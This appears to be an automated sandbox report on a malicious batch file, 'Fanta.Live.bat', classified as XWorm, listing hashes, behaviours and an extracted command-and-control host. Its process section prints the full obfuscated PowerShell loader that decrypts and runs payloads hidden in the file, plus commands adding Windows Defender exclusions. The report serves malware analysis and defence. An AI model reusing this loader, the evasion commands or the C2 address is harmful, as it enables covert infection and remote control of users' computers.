Analysis
-
max time kernel
42s -
max time network
46s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
21-06-2024 16:29
Static task
static1
General
-
Target
Fanta.Live.bat
-
Size
294KB
-
MD5
1a62623af35e61ebb5cce084602a9de3
-
SHA1
06c959f0bdb24bb40bad2f1b1608e2ae8f4efd13
-
SHA256
d9765f4bf067e521fd60ce58dae185d3b2684acc8bb758f2109474a31697a517
-
SHA512
38721b6b83286bee42c4fae39e36c5c70a36c0e33920ecdb465829542953ab08575c866d2b01166718e7c01e7ab0871f2e6f0acffbdaf9692836d496e74a2f8c
-
SSDEEP
6144:ZQD9RNujVNSqoQWl4dDUHbWzZIePg+yCeafR/YevM:uD9RcBNL1DUH6zqeP/yZafhYl
Malware Config
Extracted
xworm
super-nearest.gl.at.ply.gg:17835
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/448-15-0x0000021BFD970000-0x0000021BFD988000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 14 448 powershell.exe 23 448 powershell.exe 25 448 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 448 powershell.exe 1964 powershell.exe 4160 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 13 ip-api.com -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 448 powershell.exe 448 powershell.exe 1964 powershell.exe 1964 powershell.exe 4160 powershell.exe 4160 powershell.exe 448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 448 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 4160 powershell.exe Token: SeDebugPrivilege 448 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 448 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 2328 wrote to memory of 448 2328 cmd.exe powershell.exe PID 2328 wrote to memory of 448 2328 cmd.exe powershell.exe PID 448 wrote to memory of 1964 448 powershell.exe powershell.exe PID 448 wrote to memory of 1964 448 powershell.exe powershell.exe PID 448 wrote to memory of 4160 448 powershell.exe powershell.exe PID 448 wrote to memory of 4160 448 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fanta.Live.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EjxD+xG7Na85kgGlTssEAc5Xt3CgTxOC1t6l3g3FG9U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ycEEbUWQfAwiVVtAkmIW1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WtZPv=New-Object System.IO.MemoryStream(,$param_var); $hQDqP=New-Object System.IO.MemoryStream; $SROyA=New-Object System.IO.Compression.GZipStream($WtZPv, [IO.Compression.CompressionMode]::Decompress); $SROyA.CopyTo($hQDqP); $SROyA.Dispose(); $WtZPv.Dispose(); $hQDqP.Dispose(); $hQDqP.ToArray();}function execute_function($param_var,$param2_var){ $oAWqJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HLxpC=$oAWqJ.EntryPoint; $HLxpC.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Fanta.Live.bat';$ZKeYE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Fanta.Live.bat').Split([Environment]::NewLine);foreach ($Xhjpq in $ZKeYE) { if ($Xhjpq.StartsWith(':: ')) { $JfogR=$Xhjpq.Substring(3); break; }}$payloads_var=[string[]]$JfogR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4160
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD596b7303b3c5d43ea97d4ead95821a029
SHA1ea1ecce72a776cd922b090f28e9d5aaca1b27539
SHA2567e6faa0a80301b4dae2c6d499e68ad269378909cdd2dca17e972ff80d296b40f
SHA512edc84e846ca527e28702bf981482af921d7872af10aad705b4a527921f68bd06ce38d28c6254f4197f4985297500fcecc51a9f3051915345cd2cd474e0dcd288
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82